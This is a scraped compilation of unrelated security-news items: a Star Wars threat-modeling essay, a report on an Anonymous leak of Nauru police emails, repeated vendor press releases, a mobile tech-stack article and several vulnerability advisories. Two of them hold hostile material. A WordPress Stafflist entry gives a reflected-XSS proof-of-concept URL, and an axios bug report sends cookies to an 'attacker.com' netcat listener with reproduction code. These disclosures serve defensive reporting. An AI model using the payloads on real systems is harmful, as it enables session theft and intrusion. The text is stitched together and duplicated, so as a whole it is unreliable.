The venerable film franchise shows us how to take threats in STRIDE.

Over years of teaching threat modeling — including the STRIDE mnemonic, which I'll describe here — I've found that people often get stuck when trying to answer "what can go wrong?" My favorite way to help them clear these hurdles is with stories from a long time ago in a galaxy far, far away.

_Star Wars_ offers an accessible and expansive set of examples. It lets us focus on fun rather than fear because fun leads to engagement. Engagement leads to understanding. And understanding leads to better threat modeling.

From a certain point of view, _Star Wars: A New Hope_ is a tutorial in the STRIDE threats. Let's start with the first of those threats, "**Spoofing**."

How does R2-D2 know who Obi-Wan Kenobi is? How can he decide to play the recording of Princess Leia for Obi-Wan, but not Luke? These questions allow us to go investigate concepts of identifiers and authenticity while making them tangible and relatable.

**Questions of Authenticity: "Who Is This? What Is Your Operating Number?"  
**Authenticity first requires an identifier: a statement of who you are. This might be a name ("Han Solo") or a role ("Stormtrooper"). Either might be true or false. Given the risk of impersonation, confusion, or lies, we look for authentication factors, such as an ID, a password, or a uniform. Then we evaluate if the identifier is authentic and grant (or deny) authorization.

There are many forms of authentication to consider, depending on if the authentication is _by_ a person or a computer and _to_ a person or a computer. This gives us a way to look at spoofing in different scenarios, including the offensive mechanisms used and the defensive protections.

**Human Identifiers: "TK421, Do You Copy?"  
**People are exceptionally good at identifying people they know well, even after a long time without seeing them. Not recognizing someone is awkward because we expect to be recognized. Recognizing those you're close to: friends and family, or even co-workers, is implicit and automatic. We don't need authenticators.

But outside that circle, it gets rapidly harder. We use a lot of implicit identifiers: uniforms, knowledge, patterns of speech, and some people even use explicit ones, asking to see your identification.

Most of the heroes pretend to be someone other than themselves. Princess Leia pretends to not be a rebel leader after Darth Vader captures her ship. Old Ben pretends not to be Obi-Wan Kenobi, while lying to Luke about his father Anakin being killed by Darth Vader. Luke and Han pretend to be Stormtroopers.

**Technical Identifiers: "I Am C-3PO, Human Cyborg Relations"**  
Many types of technical identifiers exist for services, machines, files, processes, and users. Some are designed for humans, such as "threatsbook.com," others are designed for computers, such as 172.18.19.20. And of course, there's tools to map between them.

It's hard to say when the first spoofed login screen was created, but it was probably around the time teletypes were replaced with electronic terminals. Someone could easily write a program that worked like this:

*   LOGIN: Accept a name and password.
*   Store them.
*   Display "Login incorrect" and logout, allowing the real login program to run.

Authenticating to remote computers only made this worse with the same pattern of false login prompts — now labeled phishing.

_Star Wars_ also gives us examples of how people and technology interact to authenticate one another. R2-D2 authenticates Obi-Wan Kenobi before showing him the hologram of Leia. R2-D2 is also able to spoof an imperial droid when he plugs into the Death Star to find the main controls for the tractor beam, identify where Leia is being held, and shut down all the garbage smashers on the main detention level.

Clearly the Empire has an authentication problem.

**A Galaxy's Worth of Case Studies  
**Watching Obi-Wan can teach you much about cybersecurity:

*   He **Tampers** with a power converter
*   He **Repudiates** claims about Luke's father
*   He **Exceeds** **his authority** in telling Stormtroopers that "these aren't the droids you're looking for."

Right here, we have most of the elements of the STRIDE mnemonic. There's also information disclosure, and of course, from the crawl through the destruction of the first Death Star, _Star Wars_ is the story of **Information** disclosure (the I in STRIDE). That leaves only **Denial-of-service**, like blowing up a shield generator on a forest moon of Endor.

Enjoyment and stories are both powerful teaching aids. I've been using _Star Wars_ as a hook to get people excited and to give them bits that help them remember for years now. Many engineers want to have a better handle on the question "what can go wrong with this code I'm working on?" They don't want to write insecure code, and they don't want to be exploit writers or security operators.

And maybe they don’t even want to learn about something that sounds abstract, like threat _modeling_. That’s fine – we can be concrete and have fun learning about the _threats_ that motivate our work.

That's why I'm really excited to go in depth and take these lessons to the next level with my next book, _Threats: What Every Engineer Should Learn from Star Wars_, coming this fall. For all the fun, we need engineers to know what threats to consider, and what they mean. If we want people to build more secure systems ... it's our only hope!

What Star Wars Teaches Us About Threats

By Waqas
In total, Anonymous leaked 285,635 confidential emails belonging to the Nauru Police Force of the tiny Nauru Island…
This is a post from HackRead.com Read the original post: Anonymous Leak 82GB of Police Emails Against Australia’s Offshore Detention

In total, Anonymous leaked 285,635 confidential emails belonging to the Nauru Police Force of the tiny Nauru Island infamously known for being used by Australia as an offshore refugee detention center in return for aid.

On Monday, May 2nd, 2022, the Anonymous collective released 82GB worth of emails apparently belonging to the Nauru Police Force. According to Anonymous, the data leak was in protest against the alleged ill-treatment of asylum seekers and refugees carried out by Island authorities on behalf of the Australian government.

For your information, Nauru is a tiny island country in Micronesia, northeast of Australia infamously known for being used by Australia as an offshore refugee detention center in return for aid.

As seen by Hackread.com, the total number of leaked emails is 285,635 and available for direct and torrent download through the official website of “Enlace Hacktivista,” a platform that aims to “Document hacker history.”

Art from the statement Anonymous released (left) – Direct download page of the leaked emails (right)

Although Hackread.com could not analyze the trove of emails, in a statement, Anonymous explained that the leaked confidential emails contain details related to abuses that the Nauru Police Force and the Australian government tried to cover up.

The statement also demands an end to the policy of mandatory immigration detention and the permanent closing of immigration detention facilities, including on the island of Nauru.

Anonymous also urged authorities to launch an investigation of all allegations of abuse in the immigration detention centers and pay lifetime reparations to victims.

So we decided to hack the Nauru Police Force, who were tasked by the
Australian government with policing the island and obtained 285,635
confidential emails related to abuses that they tried to cover up, and we
are making them all public.

The Republic of Nauru has previously disputed reports of torture, sexual
assault and child abuse on the island. Can they still dispute this when
all their emails are out in the open?

The things we saw and read made us sick. We are asking the newly elected Australian government to by the end of 2022:

  ~ End the policy of mandatory immigration detention and permanently close
    immigration detention facilities, including on the island Nauru.

  ~ Grant permanent residence to all asylum seekers, including the 124 people
    forcibly moved out from Manus Island.

  ~ Investigate all allegations of abuse in the immigration detention centres
    and pay lifetime repairations to victims.

Anonymous!

On Twitter, Emma Best, journalist, and co-founder of a non-profit whistleblower organization DDoSecretsDistributed Denial of Secrets, aka DDoSecrets, confirmed the leak. Best also announced that the enormous data dump is also available on DDoSecrets.

On the other hand, @YourAnonNews, one of the largest social media representatives of Anonymous also tweeted about the data leak stating that “Anonymous hackers release 1/4 million Nauru Island Immigration Detention Center Police emails documenting abuses suffered by asylum seekers and refugees under successive Scott Morrison (Prime Minister of Australia since 24 August 2018) portfolios.”

@AnonOpsSE, another prominent representative of the Anonymous collective tweeted that “Enlace Hacktivista has released 285,635 emails (82 GB) from the Nauru Police Force, documenting conditions of the island and abuses endured by asylum-seekers and refugees.”

At the time of publishing this article, there was no comment from the Nauru Police Force or Australian authorities.

**Anonymous Against Police Brutality**

1.  Anonymous Hacks Spanish Police Server, Leaks Data Against Gag Law
2.  Anonymous Linked Team Hacks Kenyan Oil Firm Against Police Brutality
3.  Anonymous Hacks Chile Govt against police brutality on student protests
4.  Police Brutality: Anonymous Hacks San Bernardino County Sheriff Support Site
5.  Anonymous Shuts Down Montreal Police Site Against Brutality on Student Demo

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Anonymous Leak 82GB of Police Emails Against Australia’s Offshore Detention

IT Teams can now manage, detect, and secure all endpoints with 100% visibility across desktop, laptop, server, and mobile devices.

  
ALISO VIEJO, Calif. – \[May 3, 2022\] – Syxsense, a global leader in IT and security management solutions, today announced Syxsense Enterprise™, the world’s first IT management and endpoint security solution that delivers real-time vulnerability monitoring and instant remediation for every endpoint across an organization’s entire network environment. Syxsense Enterprise combines Syxsense Secure, Manage, and Mobile Device Manager to deliver a completely unified platform that scans and manages all endpoints, resolves problems in real-time, and reduces the risks associated with system misconfigurations. This enables organizations to better predict, identify, and remediate vulnerabilities.

“As threats get more complex, it’s important that IT teams have consolidated solutions for IT management and endpoint security. Syxsense Enterprise is designed to give them a centralized cloud-based platform for scanning, patching, recognizing, and remediating vulnerabilities that could lead to attack or exploitation of endpoints,” said Ashley Leonard, Founder and CEO at Syxsense. “By offering our customers a unified cloud solution, we enable complete control over every endpoint device on the network so they can secure business-critical resources quickly and streamline security operations.”

Syxsense Enterprise is the industry’s first Unified Security and Endpoint Management (USEM) solution that addresses the three key elements of endpoint security – vulnerabilities, patch, and compliance. It layers on a powerful workflow automation tool called Syxsense Cortex™ that remediates and eliminates endpoint security weaknesses – all through a single cloud-based, drag and drop management interface, with hundreds of prebuilt workflows. This includes the ability to identify software vulnerabilities in both OS and 3rd party applications, misconfigurations from open ports, disabled firewalls, ineffective user account polices and more.

It also includes Syxsense’s recently launched Mobile Device Management (MDM) solution, which allows IT to manage devices running on iOS, iPadOS, and Android, in addition to previously supported Windows, Linux and Mac environments. Syxsense MDM includes all the tools necessary for Device Enrollment, Inventory and Configuration Management, Application Deployment and Rollback, Data Containerization, and Remote Device Lock/Reset/Wipe (making it possible for IT to wipe sensitive data from lost or stolen devices).

“As the market shifts to a hybrid workforce, the number of endpoints is growing exponentially, with corporate network connected mobile endpoints soaring,” said Charles Kolodgy, principal at advisory firm Security Mindsets. “The need to manage and secure an increasing number of endpoints, including desktops, mobile phones and other devices, is becoming more apparent every day as sophisticated threats grow exponentially. Syxsense Enterprise is offering a solution that solves the need to both secure and manage a vast collection of endpoints. The key is the ability to scan for vulnerabilities and patch without losing business continuity.”

The key features of Syxsense Enterprise include:

Vulnerability Scanning – Prevent cyberattacks by identifying scanning authorization issues, security implementation problems, and antivirus status.

Patch Everything – Automatically deploy OS and third-party patches to remediate all endpoint vulnerabilities inside the network and on roaming devices outside the network.

Prove Compliance and Device Health – Document patching with reporting for risk assessments, vulnerable devices, task summaries and more. And scan and prioritize patching relative to risk exposure.

Quarantine Devices – Block communication for an infected device, isolate endpoints, and kill malicious processes before they impact the network.

Control All Mobile Devices – Oversee devices remotely, silently push OTA configurations, applications, and policies from iOS to Android to Windows and more.

Collaborate with Ease – IT and security teams can now collaborate in a single console to identify and close endpoint attack vectors quickly.

For more details or to schedule a demo, visit: https://www.syxsense.com/gc-demo-syxsense

**About Syxsense**

Syxsense is a leading provider of innovative, intuitive endpoint security and management technology that combines the power of artificial intelligence with industry expertise to help customers predict and remove security threats across all devices including mobile. Syxsense is the first unified security and endpoint management platform that centralizes the three key elements of endpoint security management (vulnerabilities, patch and compliance) and layers on a powerful workflow automation tool called Syxsense Cortex,™ all through a single cloud-based platform, enabling greater efficiency and collaboration between teams. The always-on technology performs in real-time so businesses can operate free of disruption from security breaches that cripple productivity and expose them to financial risk and reputational harm. For more information, visit www.syxsense.com

Syxsense Enterprise Unifies Endpoint Security and IT Management for Real-Time Vulnerability Monitoring and Remediation

Mattermost Playbooks plugin 1.25 and earlier fails to properly restrict user-level permissions, which allows playbook members to escalate their membership privileges and perform actions restricted to playbook admins.

CVE-2022-1548: Security Updates

Syxsense Enterprise delivers real-time vulnerability monitoring and remediation for all endpoints across an organization’s entire network.

**ALISO VIEJO, Calif**. – \[May 3, 2022\] – Syxsense, a global leader in IT and security management solutions, today announced Syxsense Enterprise™, the world’s first IT management and endpoint security solution that delivers real-time vulnerability monitoring and instant remediation for every endpoint across an organization’s entire network environment. Syxsense Enterprise combines Syxsense Secure, Manage, and Mobile Device Manager to deliver a completely unified platform that scans and manages all endpoints, resolves problems in real-time, and reduces the risks associated with system misconfigurations. This enables organizations to better predict, identify, and remediate vulnerabilities.

“As threats get more complex, it’s important that IT teams have consolidated solutions for IT management and endpoint security. Syxsense Enterprise is designed to give them a centralized cloud-based platform for scanning, patching, recognizing, and remediating vulnerabilities that could lead to attack or exploitation of endpoints,” said Ashley Leonard, Founder and CEO at Syxsense. “By offering our customers a unified cloud solution, we enable complete control over every endpoint device on the network so they can secure business-critical resources quickly and streamline security operations.”

Syxsense Enterprise is the industry’s first Unified Security and Endpoint Management (USEM) solution that addresses the three key elements of endpoint security – vulnerabilities, patch, and compliance. It layers on a powerful workflow automation tool called Syxsense Cortex™ that remediates and eliminates endpoint security weaknesses – all through a single cloud-based, drag and drop management interface, with hundreds of prebuilt workflows. This includes the ability to identify software vulnerabilities in both OS and 3rd party applications, misconfigurations from open ports, disabled firewalls, ineffective user account polices and more. 

It also includes Syxsense’s recently launched Mobile Device Management (MDM) solution, which allows IT to manage devices running on iOS, iPadOS, and Android, in addition to previously supported Windows, Linux and Mac environments. Syxsense MDM includes all the tools necessary for Device Enrollment, Inventory and Configuration Management, Application Deployment and Rollback, Data Containerization, and Remote Device Lock/Reset/Wipe (making it possible for IT to wipe sensitive data from lost or stolen devices). 

“As the market shifts to a hybrid workforce, the number of endpoints is growing exponentially, with corporate network connected mobile endpoints soaring,” said Charles Kolodgy, principal at advisory firm Security Mindsets. “The need to manage and secure an increasing number of endpoints, including desktops, mobile phones and other devices, is becoming more apparent every day as sophisticated threats grow exponentially. Syxsense Enterprise is offering a solution that solves the need to both secure and manage a vast collection of endpoints. The key is the ability to scan for vulnerabilities and patch without losing business continuity.”

The key features of Syxsense Enterprise include:

*   Vulnerability Scanning – Prevent cyberattacks by identifying scanning authorization issues, security implementation problems, and antivirus status. 
*   Patch Everything – Automatically deploy OS and third-party patches to remediate all endpoint vulnerabilities inside the network and on roaming devices outside the network.
*   Prove Compliance and Device Health – Document patching with reporting for risk assessments, vulnerable devices, task summaries and more. And scan and prioritize patching relative to risk exposure.
*   Quarantine Devices – Block communication for an infected device, isolate endpoints, and kill malicious processes before they impact the network. 
*   Control All Mobile Devices – Oversee devices remotely, silently push OTA configurations, applications, and policies from iOS to Android to Windows and more.
*   Collaborate with Ease – IT and security teams can now collaborate in a single console to identify and close endpoint attack vectors quickly. 

For more details or to schedule a demo, visit: https://www.syxsense.com/gc-demo-syxsense

**About Syxsense**

Syxsense is a leading provider of innovative, intuitive endpoint security and management technology that combines the power of artificial intelligence with industry expertise to help customers predict and remove security threats across all devices including mobile. Syxsense is the first unified security and endpoint management platform that centralizes the three key elements of endpoint security management (vulnerabilities, patch and compliance) and layers on a powerful workflow automation tool called Syxsense Cortex,™ all through a single cloud-based platform, enabling greater efficiency and collaboration between teams. The always-on technology performs in real-time so businesses can operate free of disruption from security breaches that cripple productivity and expose them to financial risk and reputational harm. For more information, visit www.syxse

Syxsense Launches Unified Endpoint Security and Management Platform

By Owais Sultan
What a good tech stack for a mobile app is and how to, actually, pick the right one…
This is a post from HackRead.com Read the original post: How to Choose Tech Stack for Mobile App Development

What a good tech stack for a mobile app is and how to, actually, pick the right one to avoid wasting time and resources.

**Introduction**

An excellent mobile app has to be a one-size-fits-all for your specific audience nowadays. It has to meet the needs and requirements of the users it is created for. Needless to say, all users expect only safety, smooth and flawless operation, and a user-friendly interface from your app. Taking into account the reviews of customers on the app stores, not every developer or business can ensure such an experience for their users.

According to Jat App, every company should choose the best stack for developing its mobile app. The success of the app directly depends on it. It will save tons of your time for the development, create new opportunities, and facilitate your further project. The question about how to pick the right technology stack for your future app remains urgent and concerns a lot of business owners. 

Below, you are going to learn more about it, how to choose the stack for your native app, or cross-platform app development. The modern world is mobile-oriented and you cannot deny it. If you are going to succeed with your mobile app and bring only positive experiences to your users, then read carefully and see which mobile app stack will be the most effective and valuable for you. 

**What a Tech Stack, Actually, Is**

First, let us figure out what a tech stack is. To make it simple, a tech stack is a range of tools, programming languages, libraries, and frameworks. It has two core sides — server and client. The rest of the constituents are user experience, stability, development platform, reliability, etc. 

The choice of a mobile app tech stack affects the success and efficiency of your future app. Yes, it is that important! If you do not weigh all the pros and cons and make the wrong decision, you risk wasting your time and money. Last but not least, it can cause the failure of your future app. 

Thus, choosing the right and appropriate tech stack is crucial. To do that, you have to think of the goal of your app first. 

**How to Choose a Tech Stack for Your Needs?**

A tech stack consists of:

*   Back-end

Which, in turn, includes:

*   Server
*   Database
*   Front-end 
*   Webserver
*   Web framework
*   Operating system
*   Programming language

Which includes the following components:

*   CSS 
*   HTML
*   Java Script
*   User’s Browser 

Although everything looks complicated, it is not really so. The market is full of different technology stacks. Picking one of them will not be too complicated. However, before you start working, you must have a plan that will affect the success of your app and business. Your app must have a range of appropriate features, and be functional, scalable, secure, and maintainable. 

It’s crucial to consider several aspects while creating your plan before making a decision. Let’s see how you can and should do that properly! 

**General App Needs**

All apps are different and have different needs and requirements. You cannot deny that applying the same rules and approaches to all of them is impossible. The device for which the app is created, user experience, network type, the platform to run on, time to market, etc. differ for different apps. 

All these aspects must be key factors when choosing a tech stack for a mobile app because the library, language, software, and framework you will choose will depend on them. 

**The Range of Skills of The Development Team**

Different languages and frameworks bring the same results. However, you must reach brilliant results, and thus, pick clear factors. When choosing the stack, it is crucial to take into account the developer’s skills. 

Not every tech stack is user-friendly, unfortunately. If you pick such one, it will only raise the development time. It’s not difficult to guess that the cost of the development will also grow. Vice versa, if you choose a good user-friendly stack with which your team is comfortable, you save their time and therefore, your budget. 

**The Overall Goals of The App**

While making your stack mobile choice, it is necessary to take into account the app goals. Mainely, its primary target. If the app depends on heavy load processing, then it is necessary to pick a reliable tech stack. Precisely streamlined interactions will not be suitable in this case.

**Multiple-platform Running**

If you compare an app running on one platform and the one running on all platforms, you will notice that their tech stacks will be different. But apart from that, you have to take into account the necessary set of tools to scale the app and port it to other platforms, such as Hybrid Platform App Development or Cross. They will be totally different from the set of tools required to develop a native app. 

**Parent Company**

Taking into account the parent company of the web application tech stack is also crucial when developing your app. Some platforms (Google, Adobe, or Microsoft) offer much better community support and documentation than the rest of them. Advanced development options will be a good bonus. 

**Data Security**

The safety of your data matters. Even a small leak of users’ data may seriously harm your reputation. It will all lead to the loss of trust from users. For that reason, you should always choose only the tech stack that guarantees the highest security of all information and data.

**Budget**

The type of your project is affected by many features, such as functionalities, the cost of the development, the time required to complete the project, etc. Your task is to consider all of the needs without extra features. It will boost the development process and save you money from unnecessary expenses. 

Taking into account the enlisted aspects, you will know what kind of stack you need to pick for your project. It has to make your app really innovative and scale it. 

**Compatibility With Other Technologies**

Current technologies are also important when it comes to a choice of a tech stack. They both have to comply with one another. It is not all yet. The tools you plan to input into your app later must also be compatible with the chosen stack. 

**The Difference Between Native and Cross-Platform Apps**

Native app development prevents you from difficulties with creating a sustainable product that covers several platforms and is focused on creating an appropriate design for such target platforms as iOS, Android, or others. 

Cross-platform development is aimed at creating an app that can cover as many followers of the brand as possible thanks to covering a wide amount of end devices in the process of development and programming. Cross-platform apps are perfect for new requirements of omnichannel retailing where consumers expect the main interaction between devices and channels. 

Here are the core differences between native and cross-platform apps:

*   Cost — Native app development is more expensive than cross-platform app development
*   Code usability — Native apps work for one platform while cross-platform apps can work for multiple platforms
*   Performance — Native apps have high and responsive performance while cross-platform apps have high performance, but lags and hardware compatibility issues are not uncommon
*   Device access — Native apps’ platform SDK provides access to the device’s API without any hindrance; With cross-platform apps, there is no access to all device’s API 

**Conclusion**

Choosing the application technology stack is an important stage of the development process. It has to be done before you start working on your app, otherwise, all your finances and precious time can be simply wasted. Take into account the above-mentioned factors before choosing your technology stack. It will decide whether the development process and the app itself are going to be successful.

How to Choose Tech Stack for Mobile App Development

WordPress Stafflist plugin version 3.1.2 suffers from a cross site scripting vulnerability.

**WordPress Stafflist 3.1.2 Cross Site Scripting**

Posted May 3, 2022

Authored by Hassan Khan Yusufzai

WordPress Stafflist plugin version 3.1.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 74269ba0f910606e9499b4b87b6ba8ea243f907c7743fde42c4af10707d6f9da

Download | Favorite | View

**WordPress Stafflist 3.1.2 Cross Site Scripting**

    # Exploit Title: WordPress Plugin stafflist 3.1.2 - Reflected XSS (Authenticated)# Date: 05-02-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage: https://wordpress.org/plugins/stafflist/# Version: 3.1.2# Tested on: Firefox# Contact me: h [at] spidersilk.com# Summary:A cross site scripting reflected vulnerability has been identified inWordPress Plugin stafflist version less then 3.1.2. that allowsunauthenticated users to run arbitrary javascript code insideWordPress using Stafflist Plugin.# POChttp://localhost:10003/wp-admin/admin.php?page=stafflist&remove=1&p=1%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E# Vulnerable Parametersp and s parameters are vulnerable.# Vulnerable Code:$html = ($cur > 1 ? "<p class='pager'><ahref='{$stafflisturl}&p=".($cur-1)."&s={$_GET['s']}'>Previous</a></p>" : ""); //<

**File Tags**

*   ActiveX (932)
*   Advisory (77,240)
*   Arbitrary (15,057)
*   BBS (2,859)
*   Bypass (1,550)
*   CGI (1,010)
*   Code Execution (6,627)
*   Conference (668)
*   Cracker (797)
*   CSRF (3,268)
*   DoS (21,736)
*   Encryption (2,330)
*   Exploit (49,655)
*   File Inclusion (4,142)
*   File Upload (938)
*   Firewall (821)
*   Info Disclosure (2,542)
*   Intrusion Detection (850)
*   Java (2,780)
*   JavaScript (792)
*   Kernel (5,997)
*   Local (13,976)
*   Magazine (586)
*   Overflow (12,125)
*   Perl (1,410)
*   PHP (5,038)
*   Proof of Concept (2,276)
*   Protocol (3,290)
*   Python (1,389)
*   Remote (29,590)
*   Root (3,441)
*   Ruby (574)
*   Scanner (1,629)
*   Security Tool (7,672)
*   Shell (3,054)
*   Shellcode (1,201)
*   Sniffer (879)
*   Spoof (2,077)
*   SQL Injection (15,975)
*   TCP (2,350)
*   Trojan (672)
*   UDP (866)
*   Virus (658)
*   Vulnerability (30,362)
*   Web (8,972)
*   Whitepaper (3,710)
*   x86 (942)
*   XSS (17,290)
*   Other

**File Archives**

*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   January 2022
*   December 2021
*   November 2021
*   October 2021
*   September 2021
*   August 2021
*   July 2021
*   June 2021
*   Older

**Systems**

*   AIX (425)
*   Apple (1,875)
*   BSD (368)
*   CentOS (55)
*   Cisco (1,911)
*   Debian (5,948)
*   Fedora (1,690)
*   FreeBSD (1,241)
*   Gentoo (4,152)
*   HPUX (877)
*   iOS (317)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (41,937)
*   Mac OS X (683)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (478)
*   RedHat (11,372)
*   Slackware (941)
*   Solaris (1,606)
*   SUSE (1,444)
*   Ubuntu (7,747)
*   UNIX (9,051)
*   UnixWare (184)
*   Windows (6,373)
*   Other

WordPress Stafflist 3.1.2 Cross Site Scripting

Tiger Global Management invests $35 million in SkyHawk Security to accelerate growth.

**TEL AVIV, Israel, May 3, 2022—** Radware® (NASDAQ: RDWR), a leading provider of cyber security and application delivery solutions, today announced the spinoff of its Cloud Native Protector (CNP) business to form a new company called SkyHawk Security. To accelerate

SkyHawk Security’s development and growth opportunities, an affiliate of Tiger Global

Management will make a $35 million strategic external investment, resulting in a valuation of $180 million. Tiger Global Management is a leading global technology investment firm focused on private and public companies in the internet, software, and financial technology sectors.

Skyhawk Security is a leader in cloud threat detection and protects dozens of the world’s leading organizations using its artificial intelligence and machine learning technologies. Its Cloud Native Protector provides comprehensive protection for workloads and applications hosted in public cloud environments. It uses a multi-layered approach that covers the overall security posture of the cloud and threats to individual workloads. Easy-to-deploy, the agentless solution identifies and prevents compliance violations, cloud security misconfigurations, excessive permissions, and malicious activity in the cloud.

“We recognize the growing opportunities in the public cloud security market and are planning to capitalize on them,” said Roy Zisapel, Radware’s president and CEO. “We look forward to partnering with Tiger Global Management to scale the business, unlock even more security value for customers, and position SkyHawk Security for long-term success.”

The spinoff, which adds to Radware’s recently announced strategic cloud services initiative, further demonstrates the company’s ongoing commitment to innovation. SkyHawk Security will have the ability to operate with even greater sales, marketing, and product focus as well as speed and flexibility. Current and new CNP customers will benefit from future product development efforts, while CNP services for existing customers will continue without interruption.

Radware does not expect the deal to materially affect operating results for the second quarter or full year of 2022.

**About Tiger Global Management**

Tiger Global Management is a leading global technology investment firm that focuses on private and public companies in the software, internet, and financial technology sectors. Since 2001, Tiger Global has invested in hundreds of companies across more than 30 countries, including investments ranging from Series A to pre-IPO. The firm aims to partner with dynamic entrepreneurs operating market-leading companies in its core focus areas.

**About Radware**

Radware® (NASDAQ: RDWR) is a global leader of cyber security and application delivery solutions for physical, cloud, and software defined data centers. Its award-winning solutions portfolio secures the digital experience by providing infrastructure, application, and corporate IT protection, and availability services to enterprises globally. Radware’s solutions empower enterprise and carrier customers worldwide to adapt to market challenges quickly, maintain business continuity, and achieve maximum productivity while keeping costs down. For more information, please visit the Radware website.

Radware encourages you to join our community and follow us on: Facebook, LinkedIn, Radware Blog, Twitter, YouTube, and Radware Mobile for iOS and Android.

©2022 Radware Ltd. All rights reserved. Any Radware products and solutions mentioned in this press release are protected by trademarks, patents, and pending patent applications of Radware in the U.S. and other countries. For more details, please

see: https://www.radware.com/LegalNotice/. All other trademarks and names are property of their respective owners.

Radware believes the information in this document is accurate in all material respects as of its publication date. However, the information is provided without any express, statutory, or implied warranties and is subject to change without notice.

The contents of any website or hyperlinks mentioned in this press release are for informational purposes and the contents thereof are not part of this press release.

Radware Launches SkyHawk Security, a Spinoff of Its  Cloud Native Protector Business

Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository axios/axios prior to 0.26.

**BUG**

Cookie header leaked to third party site and it allow to hijack victim account

**SUMMURY**

When fetching a remote url with Cookie if it get Location response header then it will follow that url and try to fetch that url with provided cookie . So cookie is leaked here to thirdparty.  
Ex: you try to fetch example.com with cookie and if it get redirect url to attacker.com then it fetch that redirect url with provided cookie .  
So, Cookie of example.com is leaked to attacker.com .  
Cookie is standard way to authentication into webapp and you should not leak to other site .  
All browser follow same-origin-policy so that when redirect happen browser does not send cookie of example.com to attacker.com .

**FLOW**

if you fetch http://mysite.com/redirect.php?url=http://attacker.com:8182/ then it will redirect to http://attacker.com:8182/ .

First setup a webserver and a netcat listner

**http://mysite.com/redirect.php?url=http://attacker.com:8182/**

    //redirect.php
    <?php
    $url=$_GET["url"];
    header("Location: $url");
    
    /* Make sure that code below does not get executed when we redirect. */
    exit;
    ?>
    

**netcat listner in http://attacker.com**

nc -lnvp 8182

**STEP TO RERPODUCE**

run bellow axios code

    const axios = require('axios');
    
    // Make a request for a user with a given ID
    axios.get('http://mysite.com/redirect.php?url=http://attacker.com:8182/yy',{headers:{"Cookie":"dfdd=df"}})
      .then(function (response) {
        // handle success
        console.log(response);
      })
      .catch(function (error) {
        // handle error
        console.log(error);
      })
      .then(function () {
        // always executed
      });
    
    

response received in attacker netcat

    Connection from 127.0.0.1 36724 received!
    GET /yy HTTP/1.1
    Accept: application/json, text/plain, */*
    Cookie: dfdd=df
    User-Agent: axios/0.24.0
    Host: localhost:8182
    Connection: close
    
    

So, here i provided cookie for mysite.com but due to redirect it leaks to thirdparty site attacker.com

**SUGGESTED FIX**

If provided url domain and redirect url domain is same then you can only send cookie/authorization header to redirected url . But if the both domain not same then its a third party site which will be redirected, so you dont need to send Cookie/Authorization header.

CVE-2022-1214: Exposure of Sensitive Information to an Unauthorized Actor in axios

A vulnerability in the Snort rule evaluation function of Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to improper handling of the DNS reputation enforcement rule. An attacker could exploit this vulnerability by sending crafted UDP packets through an affected device to force a buildup of UDP connections. A successful exploit could allow the attacker to cause traffic that is going through the affected device to be dropped, resulting in a DoS condition. Note: This vulnerability only affects Cisco FTD devices that are running Snort 3.

**Cisco Firepower Threat Defense Software DNS Enforcement Denial of Service Vulnerability**

High

CVE-2022-20767

CWE-399

Download CVRF

Email

**

Summary

**

*   A vulnerability in the Snort rule evaluation function of Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.
    
    The vulnerability is due to improper handling of the DNS reputation enforcement rule. An attacker could exploit this vulnerability by sending crafted UDP packets through an affected device to force a buildup of UDP connections. A successful exploit could allow the attacker to cause traffic that is going through the affected device to be dropped, resulting in a DoS condition.
    
    **Note:** This vulnerability only affects Cisco FTD devices that are running Snort 3.
    
    Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
    
    This advisory is available at the following link:  
    https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-FTD-snort3-DOS-Aq38LVdM
    
    This advisory is part of the April 2022 release of the Cisco ASA, FTD, and FMC Security Advisory Bundled publication. For a complete list of the advisories and links to them, see Cisco Event Response: April 2022 Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication.
    

**

Affected Products

**

*   This vulnerability affects Cisco platforms if they are running a vulnerable release of Cisco FTD Software and both of the following conditions are met:
    
    *   The device is running Snort 3.
    *   DNS reputation enforcement is enabled on the device.
    
    For information about which Cisco software releases are vulnerable, see the Fixed Software section of this advisory.
    
    Snort 3 is running by default for new installations of Cisco FTD releases 7.0.0 and later. On devices that were running Cisco FTD Release 6.7.0 or earlier and were upgraded to Release 7.0.0 or later, Snort 2 is running by default.
    
    DNS reputation enforcement is enabled by default on Cisco FTD releases 6.7 and later. DNS reputation enforcement was introduced in Cisco FTD Release 6.7.
    
    **Determine Cisco FTD Configuration through the FTD CLI**
    
    To determine if Snort 3 is configured on a device, log in to the FTD CLI and use the **show snort3 status** command. If the command produces the following output, the device is running Snort 3 and may be affected by this vulnerability:
    
    > \> **show snort3 status**  
    > Currently running Snort 3
    
    To determine if DNS Reputation Enforcement is enabled, do the following:
    
    1.  Log in to the FTD CLI.
    2.  Use the **expert** command to enter expert mode.
    3.  Go to the lua directory. This directory is located at /ngfw/var/sf/detection\_engines/_uuid_/lua, where _uuid_ is the universally unique identifier for the Cisco FTD installation.
    4.  Use the **grep** command to search for _dns\_filter_ in the _firewall.lua_ file in the lua directory.
        *   If **dns\_filtering\_enabled = true** is in the file, the device is affected by this vulnerability.
        *   If **dns\_filtering\_enabled = false** is in the file, the device is not affected by this vulnerability.
        *   If **dns\_filtering\_enabled** is not in the file, the device is not affected by this vulnerability.
    
    > \>expert  
    > expert admin@ftd700:~$ cd /ngfw/var/sf/detection\_engines/e4dec56e-ef9e-11eb-b690-6843d4a521ed/lua/  
    > expert admin@ftd700:~$ grep dns\_filter firewall.lua  
    >  dns\_filtering\_enabled = true
    
    **Note:** The show **access-control-config** command does not show the correct status of the DNS reputation enforcement setting due to defect CSCwb37077.
    
